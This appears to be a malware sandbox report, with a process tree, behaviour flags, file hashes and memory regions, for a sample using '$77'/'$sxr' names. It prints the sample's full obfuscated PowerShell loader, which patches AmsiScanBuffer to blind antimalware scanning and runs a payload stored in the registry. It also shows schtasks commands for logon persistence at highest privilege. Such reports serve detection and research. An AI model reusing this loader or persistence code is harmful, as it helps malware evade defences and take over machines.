$_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+[Char](101)+''+[Char](109)+''+[Char](46)+'dl'+[Char](108)+'')}).GetType(''+[Char](77)+'icro'+[Char](115)+''+'o'+''+'f'+''+[Char](116)+''+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+'a'+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+'e'+''+'t'+'h'+[Char](111)+'d'+[Char](115)+'');$KxityZUdSYjBLQ=$fwtGBqWABCmDx.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kukrsMEWCymvbXSMPxY=zMLfToattpdp @([String])([IntPtr]);$rtYFlhvnKVQPKjfmusGfgx=zMLfToattpdp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jEeBRGZfkaK=$fwtGBqWABCmDx.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+'a'+'n'+''+'d'+'l'+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+'3'+'2'+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$FYWKBtOcOKDNHu=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$jEeBRGZfkaK,[Object](''+'L'+''+'o'+'ad'+[Char](76)+''+'i'+''+[Char](98)+'r'+'a'+'r'+[Char](121)+''+'A'+'')));$atoZNIYVNfZfESwqP=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$jEeBRGZfkaK,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+'a'+'l'+''+'P'+''+'r'+'ot'+[Char](101)+''+[Char](99)+'t')));$YpQsgtg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FYWKBtOcOKDNHu,$kukrsMEWCymvbXSMPxY).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$ewTIsGMbZpMABxIVT=$KxityZUdSYjBLQ.Invoke($Null,@([Object]$YpQsgtg,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+'S'+'c'+''+[Char](97)+''+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$NimYcTXqmW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($atoZNIYVNfZfESwqP,$rtYFlhvnKVQPKjfmusGfgx).Invoke($ewTIsGMbZpMABxIVT,[uint32]8,4,[ref]$NimYcTXqmW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ewTIsGMbZpMABxIVT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($atoZNIYVNfZfESwqP,$rtYFlhvnKVQPKjfmusGfgx).Invoke($ewTIsGMbZpMABxIVT,[uint32]8,0x20,[ref]$NimYcTXqmW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+'F'+''+'T'+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CDbOzJHRquMY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hfhoOKyEIcaqNK,[Parameter(Position=1)][Type]$lhUOgKafDu)$gJaMRdZtlgL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+''+'r'+''+[Char](121)+''+'M'+'od'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'','C'+'l'+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+'n'+'s'+'i'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+',A'+[Char](117)+''+'t'+''+[Char](111)+'C'+[Char](108)+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$gJaMRdZtlgL.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+[Char](101)+''+[Char](99)+'i'+[Char](97)+''+[Char](108)+'N'+'a'+'m'+'e'+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+','+''+'P'+''+'u'+''+[Char](98)+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$hfhoOKyEIcaqNK).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$gJaMRdZtlgL.DefineMethod(''+[Char](73)+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+'w'+'Sl'+'o'+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+'r'+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$lhUOgKafDu,$hfhoOKyEIcaqNK).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'nag'+'e'+'d');Write-Output $gJaMRdZtlgL.CreateType();}$ErMXCnJHzUFBC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+[Char](105)+''+[Char](110)+''+'3'+''+'2'+''+[Char](46)+''+[Char](85)+''+'n'+'s'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+'e'+[Char](77)+'et'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$WqlvIvpMXQxywi=$ErMXCnJHzUFBC.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+'ta'+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BmZripDJPBBAwwVGkoy=CDbOzJHRquMY @([String])([IntPtr]);$GUTOFCUTSUQHYaYFXLHKLQ=CDbOzJHRquMY @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LPOGhUGjdNC=$ErMXCnJHzUFBC.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+'32.d'+[Char](108)+''+'l'+'')));$UfXRLybaqNnHJo=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$LPOGhUGjdNC,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$fMZlhiyCxLGPqHuGf=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$LPOGhUGjdNC,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+[Char](101)+'ct')));$xnszVXw=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UfXRLybaqNnHJo,$BmZripDJPBBAwwVGkoy).Invoke(''+'a'+''+'m'+'s'+[Char](105)+'.dl'+[Char](108)+'');$hBGoluISTGWONgmqK=$WqlvIvpMXQxywi.Invoke($Null,@([Object]$xnszVXw,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$tyctTZVIsx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fMZlhiyCxLGPqHuGf,$GUTOFCUTSUQHYaYFXLHKLQ).Invoke($hBGoluISTGWONgmqK,[uint32]8,4,[ref]$tyctTZVIsx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hBGoluISTGWONgmqK,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fMZlhiyCxLGPqHuGf,$GUTOFCUTSUQHYaYFXLHKLQ).Invoke($hBGoluISTGWONgmqK,[uint32]8,0x20,[ref]$tyctTZVIsx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 4360 -ip 43602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6C85.tmp.csvFilesize
37KB
MD5c0e74ecaf21b0fc184a4bbf7a91feda0
SHA1d021cc361c96bf625c7273764cc2427f43e27d07
SHA25627ebf42ee5594e44eb2fadf6ace50789173457e7b66d58cf49ad8b1d0ad57b07
SHA512c94ebd6ce44942dbff9527ad9a3931455a2c61053cb209f604c799dd905a54f4add26af557c6ffabe2c5e764ce5d73c43c992433a5af97e74ec5e449e54ee629
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6CA5.tmp.txtFilesize
13KB
MD5a9ed904f5cbbf85c8c608530d29df1db
SHA15825ed373ac7903c1e8ea3b73f7db4e5bdea0a75
SHA256bdc7db0541e6d9dcd63a36a1d9233adf39912aabb2593b9c8cdd6c788f744fb5
SHA51226e1fa271c3a067929d62bc45fcb614c85c20d8b97aeed6e4865e77149cf8b231ee8509e89656f1cbeb39d91a9696f7019062388844892205f884ba79f83676f
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Windows\Temp\__PSScriptPolicyTest_fmb05mun.l4r.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5aa187cac09f051e24146ad549a0f08a6
SHA12ef7fae3652bb838766627fa6584a6e3b5e74ff3
SHA2567036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
SHA512960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
-
memory/336-103-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmpFilesize
64KB
-
memory/336-96-0x00000248BB480000-0x00000248BB4AB000-memory.dmpFilesize
172KB
-
memory/336-102-0x00000248BB480000-0x00000248BB4AB000-memory.dmpFilesize
172KB
-
memory/600-69-0x0000021B09100000-0x0000021B0912B000-memory.dmpFilesize
172KB
-
memory/600-63-0x0000021B09100000-0x0000021B0912B000-memory.dmpFilesize
172KB
-
memory/600-61-0x0000021B090D0000-0x0000021B090F5000-memory.dmpFilesize
148KB
-
memory/600-70-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmpFilesize
64KB
-
memory/600-62-0x0000021B09100000-0x0000021B0912B000-memory.dmpFilesize
172KB
-
memory/680-74-0x00000256875D0000-0x00000256875FB000-memory.dmpFilesize
172KB
-
memory/680-80-0x00000256875D0000-0x00000256875FB000-memory.dmpFilesize
172KB
-
memory/680-81-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmpFilesize
64KB
-
memory/760-107-0x00000145A9F20000-0x00000145A9F4B000-memory.dmpFilesize
172KB
-
memory/956-85-0x000001670CC10000-0x000001670CC3B000-memory.dmpFilesize
172KB
-
memory/956-91-0x000001670CC10000-0x000001670CC3B000-memory.dmpFilesize
172KB
-
memory/956-92-0x00007FF88D2F0000-0x00007FF88D300000-memory.dmpFilesize
64KB
-
memory/1192-20-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB
-
memory/1192-0-0x0000000074B6E000-0x0000000074B6F000-memory.dmpFilesize
4KB
-
memory/1192-1-0x0000000000AB0000-0x0000000000B1C000-memory.dmpFilesize
432KB
-
memory/1192-2-0x0000000005AF0000-0x0000000006094000-memory.dmpFilesize
5.6MB
-
memory/1192-3-0x0000000005540000-0x00000000055D2000-memory.dmpFilesize
584KB
-
memory/1192-4-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB
-
memory/1192-5-0x00000000055E0000-0x0000000005646000-memory.dmpFilesize
408KB
-
memory/1192-6-0x0000000005AC0000-0x0000000005AD2000-memory.dmpFilesize
72KB
-
memory/1192-7-0x00000000068C0000-0x00000000068FC000-memory.dmpFilesize
240KB
-
memory/2332-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2332-54-0x00007FF8CD270000-0x00007FF8CD465000-memory.dmpFilesize
2.0MB
-
memory/2332-55-0x00007FF8CBDA0000-0x00007FF8CBE5E000-memory.dmpFilesize
760KB
-
memory/2332-58-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2332-49-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2332-50-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2332-53-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2332-48-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3316-47-0x00007FF8CBDA0000-0x00007FF8CBE5E000-memory.dmpFilesize
760KB
-
memory/3316-30-0x0000012FB2070000-0x0000012FB2092000-memory.dmpFilesize
136KB
-
memory/3316-46-0x00007FF8CD270000-0x00007FF8CD465000-memory.dmpFilesize
2.0MB
-
memory/3316-45-0x0000012FB22E0000-0x0000012FB230A000-memory.dmpFilesize
168KB
-
memory/3572-13-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB
-
memory/3572-14-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB
-
memory/3572-35-0x00000000075D0000-0x00000000075DA000-memory.dmpFilesize
40KB
-
memory/3572-850-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB
-
memory/3572-851-0x0000000074B60000-0x0000000075310000-memory.dmpFilesize
7.7MB